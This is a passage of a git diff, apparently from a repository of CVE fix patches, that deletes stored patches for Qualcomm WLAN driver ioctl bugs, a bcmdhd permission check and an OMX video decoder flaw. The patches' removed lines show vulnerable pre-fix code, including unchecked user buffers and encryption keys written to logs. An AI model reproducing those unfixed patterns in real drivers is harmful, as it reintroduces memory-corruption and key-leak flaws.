Ignore!!!", __func__); -- return -EBUSY; -- } -- -- hddLog(LOG1, "The function iw_qcom_set_wapi_key called "); -- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); -- hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra); -- -- hddLog(LOG1,":%s: INPUT DATA:\nKey Type:0x%02x Key Direction:0x%02x KEY ID:0x%02x", __func__, pWapiKey->keyType, pWapiKey->keyDirection, pWapiKey->keyId); -- hddLog(LOG1,"Add Index:0x"); -- for(i =0 ; i < 12 ; i++) -- hddLog(LOG1,"%02x",pWapiKey->addrIndex[i]); -- -- hddLog(LOG1,"%s: WAPI ENCRYPTION KEY LENGTH:0x%04x", __func__,pWapiKey->wpiekLen); -- hddLog(LOG1, "WAPI ENCRYPTION KEY:0x"); -- for(i =0 ; i < 16 ; i++) -- hddLog(LOG1,"%02x",pWapiKey->wpiek[i]); -- -- hddLog(LOG1,"%s: WAPI INTEGRITY CHECK KEY LENGTH:0x%04x", __func__,pWapiKey->wpickLen); -- hddLog(LOG1,"WAPI INTEGRITY CHECK KEY:0x"); -- for(i =0 ; i < 16 ; i++) -- hddLog(LOG1,"%02x",pWapiKey->wpick[i]); -- -- hddLog(LOG1,"WAPI PN NUMBER:0x"); -- for(i = 0 ; i < 16 ; i++) -- hddLog(LOG1,"%02x",pWapiKey->pn[i]); -- -- // Clear the setkey memory -- vos_mem_zero(&setKey,sizeof(tCsrRoamSetKey)); -- // Store Key ID -- setKey.keyId = (unsigned char)( pWapiKey->keyId ); -- // SET WAPI Encryption -- setKey.encType = eCSR_ENCRYPT_TYPE_WPI; -- // Key Directionn both TX and RX -- setKey.keyDirection = eSIR_TX_RX; // Do WE NEED to update this based on Key Type as GRP/UNICAST?? -- // the PAE role -- setKey.paeRole = 0 ; -- -- switch ( pWapiKey->keyType ) -- { -- case PAIRWISE_KEY: -- { -- isConnected = hdd_connIsConnected(pHddStaCtx); -- vos_mem_copy(setKey.peerMac,&pHddStaCtx->conn_info.bssId,WNI_CFG_BSSID_LEN); -- break; -- } -- case GROUP_KEY: -- { -- vos_set_macaddr_broadcast( (v_MACADDR_t *)setKey.peerMac ); -- break; -- } -- default: -- { -- //Any other option is invalid. -- VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "[%4d] %s() failed to Set Key. 
Invalid key type %d", __LINE__,__func__ , -1 ); -- -- hddLog(LOGE," %s: Error WAPI Key Add Type",__func__); -- halStatus = !eHAL_STATUS_SUCCESS; // NEED TO UPDATE THIS WITH CORRECT VALUE -- break; // NEED RETURN FROM HERE ???? -- } -- } -- -- // Concatenating the Encryption Key (EK) and the MIC key (CK): EK followed by CK -- setKey.keyLength = (v_U16_t)((pWapiKey->wpiekLen)+(pWapiKey->wpickLen)); -- pKeyPtr = setKey.Key; -- memcpy( pKeyPtr, pWapiKey->wpiek, pWapiKey->wpiekLen ); -- pKeyPtr += pWapiKey->wpiekLen; -- memcpy( pKeyPtr, pWapiKey->wpick, pWapiKey->wpickLen ); -- -- // Set the new key with SME. -- pHddStaCtx->roam_info.roamingState = HDD_ROAM_STATE_SETTING_KEY; -- -- if ( isConnected ) { -- halStatus = sme_RoamSetKey( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, &setKey, &roamId ); -- if ( halStatus != eHAL_STATUS_SUCCESS ) -- { -- VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "[%4d] sme_RoamSetKey returned ERROR status= %d", __LINE__, halStatus ); -- -- pHddStaCtx->roam_info.roamingState = HDD_ROAM_STATE_NONE; -- } -- } --#if 0 /// NEED TO CHECK ON THIS -- else -- { -- // Store the keys in the adapter to be moved to the profile & passed to -- // SME in the ConnectRequest if we are not yet in connected state. 
-- memcpy( &pAdapter->setKey[ setKey.keyId ], &setKey, sizeof( setKey ) ); -- pAdapter->fKeySet[ setKey.keyId ] = TRUE; -- -- VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO_MED, -- " Saving key [idx= %d] to apply when moving to connected state ", -- setKey.keyId ); -- -- } --#endif -- return halStatus; --} -- --static int iw_qcom_set_wapi_bkid(struct net_device *dev, struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); --#ifdef WLAN_DEBUG -- int i = 0; -- WLAN_BKID_LIST *pBkid = ( WLAN_BKID_LIST *) extra; --#endif -- -- hddLog(LOG1, "The function iw_qcom_set_wapi_bkid called"); -- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length); -- hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra); -- -- hddLog(LOG1,"%s: INPUT DATA:\n BKID Length:0x%08x", __func__,pBkid->length); -- hddLog(LOG1,"%s: BKID Cnt:0x%04x", __func__, pBkid->BKIDCount); -- -- hddLog(LOG1,"BKID KEY LIST[0]:0x"); -- -- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL, -- "%s:LOGP in Progress. 
Ignore!!!", __func__); -- return -EBUSY; -- } -- --#ifdef WLAN_DEBUG -- for(i =0 ; i < 16 ; i++) -- hddLog(LOG1,"%02x",pBkid->BKID[0].bkid[i]); --#endif -- -- return 0; --} -- --static int iw_qcom_get_wapi_bkid(struct net_device *dev, struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- /* Yet to implement this function, 19th April 2010 */ -- hddLog(LOG1, "The function iw_qcom_get_wapi_bkid called "); -- -- return 0; --} --#endif /* FEATURE_WLAN_WAPI */ -- - #ifdef WLAN_FEATURE_VOWIFI_11R - // - // -@@ -7801,14 +7512,6 @@ static const iw_handler we_private[] = { - [WLAN_PRIV_GET_OEM_DATA_RSP - SIOCIWFIRSTPRIV] = iw_get_oem_data_rsp, //oem data req Specifc - #endif - --#ifdef FEATURE_WLAN_WAPI -- [WLAN_PRIV_SET_WAPI_MODE - SIOCIWFIRSTPRIV] = iw_qcom_set_wapi_mode, -- [WLAN_PRIV_GET_WAPI_MODE - SIOCIWFIRSTPRIV] = iw_qcom_get_wapi_mode, -- [WLAN_PRIV_SET_WAPI_ASSOC_INFO - SIOCIWFIRSTPRIV] = iw_qcom_set_wapi_assoc_info, -- [WLAN_PRIV_SET_WAPI_KEY - SIOCIWFIRSTPRIV] = iw_qcom_set_wapi_key, -- [WLAN_PRIV_SET_WAPI_BKID - SIOCIWFIRSTPRIV] = iw_qcom_set_wapi_bkid, -- [WLAN_PRIV_GET_WAPI_BKID - SIOCIWFIRSTPRIV] = iw_qcom_get_wapi_bkid, --#endif /* FEATURE_WLAN_WAPI */ - #ifdef WLAN_FEATURE_VOWIFI_11R - [WLAN_PRIV_SET_FTIES - SIOCIWFIRSTPRIV] = iw_set_fties, - #endif -@@ -8214,44 +7917,6 @@ static const struct iw_priv_args we_private_args[] = { - "get_oem_data_rsp" }, - #endif - --#ifdef FEATURE_WLAN_WAPI -- /* handlers for main ioctl SET_WAPI_MODE */ -- { WLAN_PRIV_SET_WAPI_MODE, -- IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1, -- 0, -- "SET_WAPI_MODE" }, -- -- /* handlers for main ioctl GET_WAPI_MODE */ -- { WLAN_PRIV_GET_WAPI_MODE, -- 0, -- IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1, -- "GET_WAPI_MODE" }, -- -- /* handlers for main ioctl SET_ASSOC_INFO */ -- { WLAN_PRIV_SET_WAPI_ASSOC_INFO, -- IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 400, -- 0, -- "SET_WAPI_ASSOC" }, -- -- /* handlers for main ioctl SET_WAPI_KEY */ -- { WLAN_PRIV_SET_WAPI_KEY, -- 
IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 71, -- 0, -- "SET_WAPI_KEY" }, -- -- /* handlers for main ioctl SET_WAPI_BKID */ -- { WLAN_PRIV_SET_WAPI_BKID, -- IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 24, -- 0, -- "SET_WAPI_BKID" }, -- -- /* handlers for main ioctl GET_WAPI_BKID */ -- { WLAN_PRIV_GET_WAPI_BKID, -- 0, -- IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 24, -- "GET_WAPI_BKID" }, --#endif /* FEATURE_WLAN_WAPI */ -- - /* handlers for main ioctl - host offload */ - { - WLAN_PRIV_SET_HOST_OFFLOAD, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2473/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2473/ANY/0001.patch deleted file mode 100644 index e7492a22..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2473/ANY/0001.patch +++ /dev/null 
@@ -1,284 +0,0 @@ -From 0273cba64b0436d481e09222a631a6acc274b96c Mon Sep 17 00:00:00 2001 -From: Arif Hussain -Date: Tue, 7 Jan 2014 20:58:29 -0800 -Subject: wlan: Fix ioctl copy issue - -Few IOCTL's SET command's uses ODD number, -so we cannot utilize kernel facility "extra". -We need to copy the user data in kernel buffer -using copy_from_user function. - -Change-Id: I550bf90fbbacb9d5ac4187ed423fca90fafccad1 -CRs-Fixed: 596898 ---- - CORE/HDD/src/wlan_hdd_wext.c | 146 +++++++++++++++++++++++++++++++++++++------ - 1 file changed, 127 insertions(+), 19 deletions(-) - -(limited to 'CORE/HDD/src/wlan_hdd_wext.c') - -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index 55b2100..90df277 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2012-2013, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2012-2014, The Linux Foundation. All rights reserved. - * - * Previously licensed under the ISC license by Qualcomm Atheros, Inc. - * -@@ -373,6 +373,56 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest, - - /**--------------------------------------------------------------------------- - -+ \brief mem_alloc_copy_from_user_helper - -+ -+ Helper function to allocate buffer and copy user data. -+ -+ \param - wrqu - Pointer to IOCTL Data. -+ len - size -+ -+ \return - On Success pointer to buffer, On failure NULL -+ -+ --------------------------------------------------------------------------*/ -+static void *mem_alloc_copy_from_user_helper(const void *wrqu_data, size_t len) -+{ -+ u8 *ptr = NULL; -+ -+ /* in order to protect the code, an extra byte is post appended to the buffer -+ * and the null termination is added. However, when allocating (len+1) byte -+ * of memory, we need to make sure that there is no uint overflow when doing -+ * addition. In theory check len < UINT_MAX protects the uint overflow. 
For -+ * wlan private ioctl, the buffer size is much less than UINT_MAX, as a good -+ * guess, now, it is assumed that the private command buffer size is no -+ * greater than 4K (4096 bytes). So we use 4096 as the upper boundary for now. -+ */ -+ if (len > MAX_USER_COMMAND_SIZE) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "Invalid length"); -+ return NULL; -+ } -+ -+ ptr = kmalloc(len + 1, GFP_KERNEL); -+ if (NULL == ptr) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "unable to allocate memory"); -+ return NULL; -+ } -+ -+ if (copy_from_user(ptr, wrqu_data, len)) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "%s: failed to copy data to user buffer", __func__); -+ kfree(ptr); -+ return NULL; -+ } -+ ptr[len] = '\0'; -+ return ptr; -+} -+ -+/**--------------------------------------------------------------------------- -+ - \brief hdd_wlan_get_version() - - - This function use to get Wlan Driver, Firmware, & Hardware Version. -@@ -4220,15 +4270,13 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - VOS_STATUS vstatus; - int sub_cmd = wrqu->data.flags; - int ret = 0; /* success */ -+ char *pBuffer = NULL; - hdd_adapter_t *pAdapter = (netdev_priv(dev)); - hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter); - #ifdef WLAN_FEATURE_VOWIFI - hdd_config_t *pConfig = pHddCtx->cfg_ini; - #endif /* WLAN_FEATURE_VOWIFI */ - -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length); -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, extra); -- - if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) - { - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL, -@@ -4236,15 +4284,30 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - return -EBUSY; - } - -+ /* ODD number is used for set, copy data using copy_from_user */ -+ pBuffer = 
mem_alloc_copy_from_user_helper(wrqu->data.pointer, -+ wrqu->data.length); -+ if (NULL == pBuffer) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "mem_alloc_copy_from_user_helper fail"); -+ return -ENOMEM; -+ } -+ -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, -+ "%s: Received length %d", __func__, wrqu->data.length); -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, -+ "%s: Received data %s", __func__, pBuffer); -+ - switch(sub_cmd) - { - case WE_WOWL_ADD_PTRN: - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "ADD_PTRN"); -- hdd_add_wowl_ptrn(pAdapter, extra); -+ hdd_add_wowl_ptrn(pAdapter, pBuffer); - break; - case WE_WOWL_DEL_PTRN: - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "DEL_PTRN"); -- hdd_del_wowl_ptrn(pAdapter, extra); -+ hdd_del_wowl_ptrn(pAdapter, pBuffer); - break; - #if defined WLAN_FEATURE_VOWIFI - case WE_NEIGHBOR_REPORT_REQUEST: -@@ -4259,7 +4322,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - if( !neighborReq.no_ssid ) - { - neighborReq.ssid.length = (wrqu->data.length - 1) > 32 ? 
32 : (wrqu->data.length - 1) ; -- vos_mem_copy( neighborReq.ssid.ssId, extra, neighborReq.ssid.length ); -+ vos_mem_copy( neighborReq.ssid.ssId, pBuffer, neighborReq.ssid.length ); - } - - callbackInfo.neighborRspCallback = NULL; -@@ -4277,10 +4340,10 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - #endif - case WE_SET_AP_WPS_IE: - hddLog( LOGE, "Received WE_SET_AP_WPS_IE" ); -- sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), extra, wrqu->data.length ); -+ sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), pBuffer, wrqu->data.length ); - break; - case WE_SET_CONFIG: -- vstatus = hdd_execute_config_command(pHddCtx, extra); -+ vstatus = hdd_execute_config_command(pHddCtx, pBuffer); - if (VOS_STATUS_SUCCESS != vstatus) - { - ret = -EINVAL; -@@ -4293,6 +4356,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in - break; - } - } -+ kfree(pBuffer); - return ret; - } - -@@ -5014,7 +5078,6 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); - tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter); - int sub_cmd = wrqu->data.flags; -- int *value = (int*)extra; - int apps_args[MAX_VAR_ARGS] = {0}; - int num_args = wrqu->data.length; - hdd_station_ctx_t *pStaCtx = NULL ; -@@ -5035,7 +5098,14 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info - { - num_args = MAX_VAR_ARGS; - } -- vos_mem_copy(apps_args, value, (sizeof(int)) * num_args); -+ -+ /* ODD number is used for set, copy data using copy_from_user */ -+ if (copy_from_user(apps_args, wrqu->data.pointer, (sizeof(int)) * num_args)) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "%s: failed to copy data to user buffer", __func__); -+ return -EFAULT; -+ } - - if(( sub_cmd == WE_MCC_CONFIG_CREDENTIAL ) || - (sub_cmd == WE_MCC_CONFIG_PARAMS )) -@@ -6377,9 +6447,23 @@ static int iw_set_packet_filter_params(struct net_device *dev, 
struct iw_request - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- tpPacketFilterCfg pRequest = (tpPacketFilterCfg) extra; -+ tpPacketFilterCfg pRequest = NULL; -+ int ret; - -- return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId); -+ /* ODD number is used for set, copy data using copy_from_user */ -+ pRequest = mem_alloc_copy_from_user_helper(wrqu->data.pointer, -+ wrqu->data.length); -+ if (NULL == pRequest) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "mem_alloc_copy_from_user_helper fail"); -+ return -ENOMEM; -+ } -+ -+ ret = wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId); -+ kfree(pRequest); -+ -+ return ret; - } - #endif - static int iw_get_statistics(struct net_device *dev, -@@ -7053,10 +7137,10 @@ static int iw_set_band_config(struct net_device *dev, - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- tANI_U8 *ptr = extra; -+ tANI_U8 *ptr = NULL; - int ret = 0; - -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__); -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: ", __func__); - - if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress) - { -@@ -7065,23 +7149,47 @@ static int iw_set_band_config(struct net_device *dev, - return -EBUSY; - } - -+ /* ODD number is used for set, copy data using copy_from_user */ -+ ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer, -+ wrqu->data.length); -+ if (NULL == ptr) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "mem_alloc_copy_from_user_helper fail"); -+ return -ENOMEM; -+ } -+ - if (memcmp(ptr, "SETBAND ", 8) == 0) - { - /* Change band request received */ - ret = hdd_setBand_helper(dev, ptr); -- return ret; -- - } -- return 0; -+ kfree(ptr); -+ -+ return ret; - } - - static int iw_set_power_params_priv(struct net_device *dev, - struct iw_request_info *info, - union iwreq_data *wrqu, char 
*extra) - { -+ int ret; -+ char *ptr; - VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, - "Set power params Private"); -- return iw_set_power_params(dev,info,wrqu,extra,0); -+ /* ODD number is used for set, copy data using copy_from_user */ -+ ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer, -+ wrqu->data.length); -+ if (NULL == ptr) -+ { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "mem_alloc_copy_from_user_helper fail"); -+ return -ENOMEM; -+ } -+ -+ ret = iw_set_power_params(dev, info, wrqu, ptr, 0); -+ kfree(ptr); -+ return ret; - } - - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0001.patch deleted file mode 100644 index 626ed25f..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0001.patch +++ /dev/null 
@@ -1,41 +0,0 @@
-From d541aecce07c65fee3ad3a4d900016e4d22f2b3d Mon Sep 17 00:00:00 2001
-From: Karthik Jadala
-Date: Wed, 4 May 2016 11:15:45 +0530
-Subject: qcacld-2.0: Fix buffer overwrite problem in CCXBEACONREQ
-
-Set the number of IE fields to minimum of input data and
-SIR_ESE_MAX_MEAS_IE_REQS.
-Change-Id: Ie53cfec7872ab69530bbb8932f9f9e85fb319f92
-CRs-Fixed: 993561
----
- CORE/HDD/src/wlan_hdd_main.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index c3e3786..4d5a86c 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -5530,17 +5530,17 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue,
- /*no argument followed by spaces*/
- if ('\0' == *inPtr) return -EINVAL;
-
-- /*getting the first argument ie measurement token*/
-+ /*getting the first argument ie Number of IE fields*/
- v = sscanf(inPtr, "%31s ", buf);
- if (1 != v) return -EINVAL;
-
- v = kstrtos32(buf, 10, &tempInt);
- if ( v < 0) return -EINVAL;
-
-+ tempInt = VOS_MIN(tempInt, SIR_ESE_MAX_MEAS_IE_REQS);
- pEseBcnReq->numBcnReqIe = tempInt;
-
-- VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO_HIGH,
-- "Number of Bcn Req Ie fields(%d)", pEseBcnReq->numBcnReqIe);
-+ hddLog(LOG1, "Number of Bcn Req Ie fields: %d", pEseBcnReq->numBcnReqIe);
-
- for (j = 0; j < (pEseBcnReq->numBcnReqIe); j++)
- {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0002.patch
deleted file mode 100644
index 9e47b371..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2474/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,99 +0,0 @@ -From 681c310490e49adc43065d1d11006c5a5dc43568 Mon Sep 17 00:00:00 2001 -From: Srinivas Girigowda -Date: Tue, 7 Jun 2016 08:51:34 -0700 -Subject: qcacld-2.0: Validate CCXBEACONREQ IE fields - -Validate CCXBEACONREQ IE fields. - -Change-Id: Ie64a642abdd7923e91801186aa5743094a739fc9 -CRs-Fixed: 1025185 ---- - CORE/HDD/src/wlan_hdd_main.c | 28 ++++++++++++++-------------- - 1 file changed, 14 insertions(+), 14 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c -index b3e855a..bd5c69d 100644 ---- a/CORE/HDD/src/wlan_hdd_main.c -+++ b/CORE/HDD/src/wlan_hdd_main.c -@@ -4201,7 +4201,8 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue, - tCsrEseBeaconReq *pEseBcnReq) - { - tANI_U8 *inPtr = pValue; -- int tempInt = 0; -+ uint8_t input = 0; -+ uint32_t tempInt = 0; - int j = 0, i = 0, v = 0; - char buf[32]; - -@@ -4224,11 +4225,11 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue, - v = sscanf(inPtr, "%31s ", buf); - if (1 != v) return -EINVAL; - -- v = kstrtos32(buf, 10, &tempInt); -+ v = kstrtou8(buf, 10, &input); - if (v < 0) return -EINVAL; - -- tempInt = VOS_MIN(tempInt, SIR_ESE_MAX_MEAS_IE_REQS); -- pEseBcnReq->numBcnReqIe = tempInt; -+ input = VOS_MIN(input, SIR_ESE_MAX_MEAS_IE_REQS); -+ pEseBcnReq->numBcnReqIe = input; - - hddLog(LOG1, "Number of Bcn Req Ie fields: %d", pEseBcnReq->numBcnReqIe); - -@@ -4249,24 +4250,24 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue, - v = sscanf(inPtr, "%31s ", buf); - if (1 != v) return -EINVAL; - -- v = kstrtos32(buf, 10, &tempInt); -+ v = kstrtou32(buf, 10, &tempInt); - if (v < 0) return -EINVAL; - - switch (i) { - case 0: /* Measurement token */ -- if (tempInt <= 0) { -+ if (!tempInt) { - VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "Invalid Measurement Token(%d)", tempInt); -+ "Invalid Measurement Token: %d", tempInt); - return -EINVAL; - } - pEseBcnReq->bcnReq[j].measurementToken = tempInt; - break; - - case 1: /* Channel 
number */ -- if ((tempInt <= 0) || -+ if ((!tempInt) || - (tempInt > WNI_CFG_CURRENT_CHANNEL_STAMAX)) { - VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "Invalid Channel Number(%d)", tempInt); -+ "Invalid Channel Number: %d", tempInt); - return -EINVAL; - } - pEseBcnReq->bcnReq[j].channel = tempInt; -@@ -4276,19 +4277,18 @@ static VOS_STATUS hdd_parse_ese_beacon_req(tANI_U8 *pValue, - if ((tempInt < eSIR_PASSIVE_SCAN) || - (tempInt > eSIR_BEACON_TABLE)) { - VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "Invalid Scan Mode(%d) Expected{0|1|2}", tempInt); -+ "Invalid Scan Mode: %d Expected{0|1|2}", tempInt); - return -EINVAL; - } - pEseBcnReq->bcnReq[j].scanMode= tempInt; - break; - - case 3: /* Measurement duration */ -- if (((tempInt <= 0) && -+ if (((!tempInt) && - (pEseBcnReq->bcnReq[j].scanMode != eSIR_BEACON_TABLE)) || -- ((tempInt < 0) && -- (pEseBcnReq->bcnReq[j].scanMode == eSIR_BEACON_TABLE))) { -+ ((pEseBcnReq->bcnReq[j].scanMode == eSIR_BEACON_TABLE))) { - VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "Invalid Measurement Duration(%d)", tempInt); -+ "Invalid Measurement Duration: %d", tempInt); - return -EINVAL; - } - pEseBcnReq->bcnReq[j].measurementDuration = tempInt; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch deleted file mode 100644 index fc49c935..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c -index c67c975..35fa6cb 100644 ---- a/drivers/net/wireless/bcmdhd/wl_android.c -+++ b/drivers/net/wireless/bcmdhd/wl_android.c -@@ -1288,6 +1288,11 @@ - goto exit; - } - -+ if (!capable(CAP_NET_ADMIN)) { -+ ret = -EPERM; -+ goto exit; -+ } -+ - #ifdef CONFIG_COMPAT - if (is_compat_task()) { - compat_android_wifi_priv_cmd compat_priv_cmd; 
diff --git a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch.base64
deleted file mode 100644
index ef7d8abc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2475/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch
deleted file mode 100644
index 420fbeff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 3b84707..977aef2 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -4272,110 +4272,7 @@
-
- DEBUG_PRINT_LOW("Set Config Called");
-
-- if (configIndex == (OMX_INDEXTYPE)OMX_IndexVendorVideoExtraData) {
-- OMX_VENDOR_EXTRADATATYPE *config = (OMX_VENDOR_EXTRADATATYPE *) configData;
-- DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData called");
-- if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.avc") ||
-- !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mvc")) {
-- DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData AVC");
-- OMX_U32 extra_size;
-- // Parsing done here for the AVC atom is definitely not generic
-- // Currently this piece of code is working, but certainly
-- // not tested with all .mp4 files.
-- // Incase of failure, we might need to revisit this
-- // for a generic piece of code.
--
-- // Retrieve size of NAL length field
-- // byte #4 contains the size of NAL lenght field
-- nal_length = (config->pData[4] & 0x03) + 1;
--
-- extra_size = 0;
-- if (nal_length > 2) {
-- /* Presently we assume that only one SPS and one PPS in AvC1 Atom */
-- extra_size = (nal_length - 2) * 2;
-- }
--
-- // SPS starts from byte #6
-- OMX_U8 *pSrcBuf = (OMX_U8 *) (&config->pData[6]);
-- OMX_U8 *pDestBuf;
-- m_vendor_config.nPortIndex = config->nPortIndex;
--
-- // minus 6 --> SPS starts from byte #6
-- // minus 1 --> picture param set byte to be ignored from avcatom
-- m_vendor_config.nDataSize = config->nDataSize - 6 - 1 + extra_size;
-- m_vendor_config.pData = (OMX_U8 *) malloc(m_vendor_config.nDataSize);
-- OMX_U32 len;
-- OMX_U8 index = 0;
-- // case where SPS+PPS is sent as part of set_config
